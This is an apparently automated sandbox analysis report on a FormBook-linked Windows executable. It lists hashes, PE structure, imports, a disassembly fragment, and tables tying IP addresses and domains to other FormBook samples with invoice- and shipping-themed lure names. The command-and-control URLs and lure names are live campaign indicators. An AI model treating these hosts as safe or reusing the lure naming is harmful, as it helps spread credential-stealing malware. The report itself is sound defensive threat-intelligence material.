• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: Doc 784-01965670.exe
Time | Type | Description
16:56:53 | API Interceptor | 13436804x Sleep call for process: schtasks.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
8.210.49.139 | BL.exe | Get hash | malicious | FormBook | Browse | www.djazdgc.tokyo/0628/
103.106.67.112 | BL.exe | Get hash | malicious | FormBook | Browse | www.sailforever.xyz/hshp/
103.106.67.112 | BILL OF LADDING.exe | Get hash | malicious | FormBook | Browse | www.sailforever.xyz/hshp/
209.74.64.187 | BL.exe | Get hash | malicious | FormBook | Browse | www.jagdud.store/qxse/
209.74.64.187 | rDRAWINGDWGSINC.exe | Get hash | malicious | FormBook | Browse | www.turnnex.online/dhzn/
209.74.64.187 | ROQ_972923.exe | Get hash | malicious | FormBook | Browse | www.goldpal.xyz/ym9o/
209.74.64.187 | BILL OF LADDING.exe | Get hash | malicious | FormBook | Browse | www.jagdud.store/qxse/
209.74.64.187 | PO59458.exe | Get hash | malicious | FormBook | Browse | www.cotxot.info/fqdb/
209.74.64.187 | FDA.exe | Get hash | malicious | FormBook | Browse | www.selectox.xyz/b26r/
65.21.196.90 | TT Swift copy1.exe | Get hash | malicious | FormBook | Browse | www.030002832.xyz/o2wj/
65.21.196.90 | BL.exe | Get hash | malicious | FormBook | Browse | www.030002837.xyz/y045/
65.21.196.90 | rDRAWINGDWGSINC.exe | Get hash | malicious | FormBook | Browse | www.030002832.xyz/k59q/
65.21.196.90 | DHL AWB TRACKING DETAILS.exe | Get hash | malicious | FormBook | Browse | www.030002787.xyz/jd21/?4h=5kdLJS6M41di2+SNW7K1XcXipX6NQkkN8kSgJbF3gr0dFVoGwgZsF4aW2rsxuxwIowbH&pPQ=OJEtxf4
65.21.196.90 | jeez.exe | Get hash | malicious | FormBook | Browse | www.030002803.xyz/bw0u/
65.21.196.90 | quote894590895pdf.exe | Get hash | malicious | FormBook | Browse | www.030002832.xyz/k59q/
65.21.196.90 | AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe | Get hash | malicious | FormBook | Browse | www.030002252.xyz/2ncs/
                                                                                                                                  NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.030002304.xyz/6uay/
                                                                                                                                  8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.030002304.xyz/f06i/
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.030002837.xyz/y045/
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  webredir.vip.gandi.netrDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  CENA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  fJD7ivEnzm.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  www.rudemyvague.infoBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 52.13.151.179
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 52.13.151.179
                                                                                                                                  www.launchdreamidea.xyzBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  CENA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  www.drevohome.shopBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 94.23.162.163
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 54.38.220.85
                                                                                                                                  longg002.cnBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 8.210.49.139
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 8.210.49.139
                                                                                                                                  www.itemsort.shopBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  CP-ASDETT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  https://eadzhost.net/quieter/QUOTE_TECNO_GAZ_INDUSTRIES_63787_MC.rarGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.29.43
                                                                                                                                  na.htaGet hashmaliciousCobalt Strike, FormBook, GuLoaderBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  jeez.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  quote894590895pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  MULTIBAND-NEWHOPEUSBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.64.187
                                                                                                                                  Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                  • 209.74.64.189
                                                                                                                                  Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.64.190
                                                                                                                                  #U8a02#U55ae#U63cf#U8ff0.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.64.190
                                                                                                                                  rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.64.187
                                                                                                                                  r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.64.190
                                                                                                                                  Tandemmernes90.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  • 209.74.64.189
                                                                                                                                  PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.64.190
                                                                                                                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.95.29
                                                                                                                                  Aunali_khokhawala-In Services.Agreement-SDYAMPA 416944.rtfGet hashmaliciousEvilProxy, Fake Captcha, HTMLPhisherBrowse
                                                                                                                                  • 209.74.66.146
                                                                                                                                  CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCPO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                  • 8.210.3.99
                                                                                                                                  BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 8.210.49.139
                                                                                                                                  index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                  • 47.254.175.252
                                                                                                                                  index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                  • 47.254.175.252
                                                                                                                                  PDWsetup.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                  • 8.217.62.104
                                                                                                                                  request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                  • 8.223.114.243
                                                                                                                                  SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 47.241.41.42
                                                                                                                                  SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 47.241.41.42
                                                                                                                                  yakuza.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 47.57.30.200
                                                                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 47.245.134.47
                                                                                                                                  VOYAGERNET-AS-APVoyagerInternetLtdNZBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 103.106.67.112
                                                                                                                                  arm.nn-20241014-0317.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                  • 114.23.169.157
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 103.106.67.112
                                                                                                                                  Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 103.106.67.112
                                                                                                                                  0wG3Y7nLHa.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                  • 111.65.234.232
                                                                                                                                  i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 202.154.140.243
                                                                                                                                  xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 203.96.31.242
                                                                                                                                  KKveTTgaAAsecNNaaaa.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 103.146.201.21
                                                                                                                                  kz7iLmqRuq.exeGet hashmaliciousQuasarBrowse
                                                                                                                                  • 203.96.177.211
                                                                                                                                  https://app.realcreator.co/preview/9fe9f3e5-8e52-4155-934b-225a56159ee0Get hashmaliciousUnknownBrowse
                                                                                                                                  • 103.146.241.97
                                                                                                                                  No context
                                                                                                                                  No context
Process: C:\Windows\SysWOW64\schtasks.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
Process: C:\Users\user\Desktop\Doc 784-01965670.exe
File Type: data
Category: dropped
Size (bytes): 286208
Entropy (8bit): 7.993538876716945
Encrypted: true
SSDEEP: 6144:9X832UkLA2nHI8y6UBj3bUfEzcA0eVsFKxcoLqF6YTXzkdA:9EhkLNIOALUCxmomoOFdTIdA
MD5: 9203C945B4CC19F67F45A6D12967F070
SHA1: D87D718E78EE27228F8AE8E9F41AB7BE5A80036E
SHA-256: 38AF42D36BA0BE376F0A616B5AC6AE49A77B94F8D110727AF6C171DB2A0D9B93
SHA-512: 68A416142108E71EF64C21B3429FA847F479632781832D777C32768A254D30B89F02D520E378A42C54D7995E5392A168D6C9731EFCCE9C23071F97CA170ECBE3
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.50834362014965
TrID:
• Win32 Executable (generic) a (10002005/4) 95.11%
• AutoIt3 compiled script executable (510682/80) 4.86%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Doc 784-01965670.exe
File size: 1'321'247 bytes
MD5: f9d3e00cde42773f49276bfd202813f5
SHA1: 79e43e7b0d15c4ed5f8fdd1d1e89edf58d5ec1ac
SHA256: 0192d385d59bc9e853e7b58a9e3cf65857b7be49c3ba92185bfd7241a36ccc0d
SHA512: 99450a24bd67d69d2a65a0366c5b501430569ace4b11422b8b06cb27248e4692873b64d9ea545260e739b8c65073d28b168794647650061b4623368e2e1522bf
SSDEEP: 24576:ffmMv6Ckr7Mny5QLufE2AZ71OteoDBB44oMEp1oUeot:f3v+7/5QLufElMX4BMEroUe+
TLSH: 4D55F112B7D680F6E9A33971297BE32BDB3575194337C4C7A7E02E768E211409B36362
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
Icon Hash: 1733312925935517
Entrypoint: 0x416310
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: aaaa8913c89c8aa4a5d93f06853894da
Instruction
call 00007F8EA057DA2Ch
jmp 00007F8EA05717FEh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F8EA057198Ah
cmp edi, eax
jc 00007F8EA0571B2Ah
cmp ecx, 00000100h
jc 00007F8EA05719A1h
cmp dword ptr [004A94E0h], 00000000h
je 00007F8EA0571998h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007F8EA057198Ah
pop esi
pop edi
pop ebp
jmp 00007F8EA0571DEAh
test edi, 00000003h
jne 00007F8EA0571997h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007F8EA05719ACh
rep movsd
jmp dword ptr [00416494h+edx*4]
nop
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007F8EA057198Eh
and eax, 03h
add ecx, eax
jmp dword ptr [004163A8h+eax*4]
jmp dword ptr [004164A4h+ecx*4]
nop
jmp dword ptr [00416428h+ecx*4]
nop
mov eax, E4004163h
arpl word ptr [ecx+00h], ax
or byte ptr [ecx+eax*2+00h], ah
and edx, ecx
mov al, byte ptr [esi]
mov byte ptr [edi], al
mov al, byte ptr [esi+01h]
mov byte ptr [edi+01h], al
mov al, byte ptr [esi+02h]
shr ecx, 02h
mov byte ptr [edi+02h], al
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007F8EA057194Eh
Programming Language:
• [ASM] VS2008 SP1 build 30729
• [ C ] VS2008 SP1 build 30729
• [C++] VS2008 SP1 build 30729
• [ C ] VS2005 build 50727
• [IMP] VS2005 build 50727
• [ASM] VS2008 build 21022
• [RES] VS2008 build 21022
• [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8cd3c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9298 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x840 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x80017 | 0x80200 | 6c20c6bf686768b6f134f5bd508171bc | False | 0.5602991615853659 | data | 6.634688230255595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xd95c | 0xda00 | f979966509a93083729d23cdfd2a6f2d | False | 0.36256450688073394 | data | 4.880040824124099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a518 | 0x6800 | e5d77411f751d28c6eee48a743606795 | False | 0.1600060096153846 | data | 2.2017649896261107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9298 | 0x9400 | f6be76de0ef2c68f397158bf01bdef3e | False | 0.4896801097972973 | data | 5.530303089784181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x43a | data | English | Great Britain | 0.3733826247689464
RT_STRING | 0xb2c78 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3278 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb38d8 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3c60 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3db8 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3e40 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3e58 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3e70 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3e88 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb4028 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, 
GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                                                                  GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
